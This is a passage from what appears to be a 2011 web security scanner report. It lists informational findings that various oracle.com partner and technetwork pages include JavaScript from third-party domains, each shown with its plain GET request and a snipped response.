Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~...[SNIP]...
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41072152049770208,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.176. http://www.oracle.com/partners/secure/news/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/news/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/news/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~...[SNIP]...
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41072182114541814,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.177. http://www.oracle.com/partners/secure/news/worldwide-opn-newsletter/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/news/worldwide-opn-newsletter/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/news/worldwide-opn-newsletter/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~...[SNIP]...
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41154061371073278,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.178. http://www.oracle.com/partners/secure/sales/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/sales/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/sales/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~BFD4B48782C099CF9463E2B9F223CF8B2E10719CAC2AC15A0FB3594A7AB2353F1D40C84637B9A3D4BBA894B42FF9DF20284C60EE3042DF8EB042E7F33AEE7B9C27327819F72CAAFBBB9DE935211EA0DB21A4D08F316C8FB109EEE4C8F88BBA9A3EF42BB3F617D1B4B84EC0335035BA18C71BC50ACC7E6B7362A47555F01E23B50A3D99A6B4ABB726DFEB056F62AC3F179B508FAA080C64019AC81865069953DEC016FA154737D44ECDD452910F012E41213ED4B601092B1107C9964425A960E91532B39636A013D4F6893C1448AAA9A10770F4A9D0DFC1FDD452496F815172D73357BA36C2CB2DED6B4535F407CBBF24665C148B673637E959EE21CB392556A81DA997BEA9317284ADFD3CEAC194E069269499C78D84B2C3BD9991F12CCBA9E3F325E5C512E1591C
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=35732013052224862,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.179. http://www.oracle.com/partners/secure/sales/partner-ordering-portal/partner-ordering-portal-020782.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/sales/partner-ordering-portal/partner-ordering-portal-020782.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/sales/partner-ordering-portal/partner-ordering-portal-020782.htm HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~...[SNIP]...
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=35732734606742442,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.180. http://www.oracle.com/partners/secure/sales/pricing-licensing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/sales/pricing-licensing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/sales/pricing-licensing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~229223FEC64DCE047F94BAFDFC66940B9C83F38403EB5BAC1AA682F1DD7AF92795BB1A864B83C2FCA81D391472B85A4114206CBCF8B3CC5A7C013C27EB2D5AB582D28399C8FED1134622F1CD1AF2D7587151C3B74FECBA0C55FF8B8FC8D47005E13013BD14026D04753B065346AC69384FADEE6737C733727722143A21C94A5DA47AC37E489FAF8D98A126CF15ADC216F8ED0A94D1352D1B57C9D3F3AF06DB1774DFBFF456DD329A3F40CA363CEAC33D1F57AFF902AC03A371E80FC5BD4B47DF373C294D936CD8636B9657BE01C46D9819D4758E13B0756AA9819074721C72EA074CAE5D852C1C45E46DC53BC7ED29CD87010E9C7A93986FB54D1D1AEC330B47C41F300A418F25FA542DBB0C6F4DD25D6BBD2FE141A9930EEB6128E7AFABB4A731CEEB25EC3CDDE51D02563A1A7384D1E898F0C078E0FB7F3C5E01B1B1C7AB01155111147FB56D5D
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41140420554967896,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.181. http://www.oracle.com/partners/secure/sales/resell-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/sales/resell-support/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/sales/resell-support/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~E8AF3A13C9A10C4CEB5F05FE704E6145AE9721C5522886B8C204F4A52528C687424705B84106F4BD2DE4CAB313E4B39D1E0A1AA937BC0707ED5E85CB2F3563DACAF2050432A043DC6CC4F4E2A8BF81AB5259A2B8F0A0BDCF5655EB82D2349DD819BAB0A63D104B71A5616A9790BD2A4869D8947399971DE8DAF7A241044D474CDEAB522CC0759A3CB7A573D17D48F895EB1146E477F2FFF360249F1394522888884B11F47EB1789F9E31D2D0A8609AAA292EC913C2657E2F48B0A829246E2535BD971E13F2989558623AF374CD4EDA8F96D0175DFE2671430C5E30C223647CAC8AF6D9CBBA8A401D3BD276C73040187DEB50A0FC460389DCE39F90BF235F2F85498BE2DC70C523F5D7810687AF562764F83D79A28698E3104517166A060D25E26CBE4538FA35BFB494FB5BBB94C654ABC01368B1CED8B523F7D34C69E14BB996
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=35982882092010873,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.182. http://www.oracle.com/partners/secure/sales/sales-kits/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/sales/sales-kits/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/sales/sales-kits/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~...[SNIP]...
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=35982912156782475,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.183. http://www.oracle.com/partners/secure/support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/support/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/support/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~...[SNIP]...
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41155727818412421,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:09:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.184. http://www.oracle.com/technetwork/apps-tech/index-095827.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/apps-tech/index-095827.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/apps-tech/index-095827.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41155766473119038,0:1)
Date: Tue, 06 Sep 2011 16:09:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.185. http://www.oracle.com/technetwork/apps-tech/index-097651.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/apps-tech/index-097651.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/apps-tech/index-097651.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35983045300771156,0:1)
Date: Tue, 06 Sep 2011 16:09:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128917

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.186. http://www.oracle.com/technetwork/apps-tech/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/apps-tech/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/apps-tech/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41074097669987687,0:1)
Date: Tue, 06 Sep 2011 16:09:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.187. http://www.oracle.com/technetwork/architect/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/architect/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/architect/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41155972631552464,0:1)
Date: Tue, 06 Sep 2011 16:09:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.188. http://www.oracle.com/technetwork/articles/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/articles/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/articles/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35925501328067259,0:1)
Date: Tue, 06 Sep 2011 16:09:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132727

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.189. http://www.oracle.com/technetwork/community/developer-vm/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/community/developer-vm/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/community/developer-vm/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41112056590278304,0:1)
Date: Tue, 06 Sep 2011 16:09:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134004

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.190. http://www.oracle.com/technetwork/community/join/overview/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/community/join/overview/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/community/join/overview/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41074239403910534,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126796

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.191. http://www.oracle.com/technetwork/community/oracle-ace/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/community/oracle-ace/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /technetwork/community/oracle-ace/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35656713684448957,0:1)
Date: Tue, 06 Sep 2011 16:09:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132855

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</h3>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
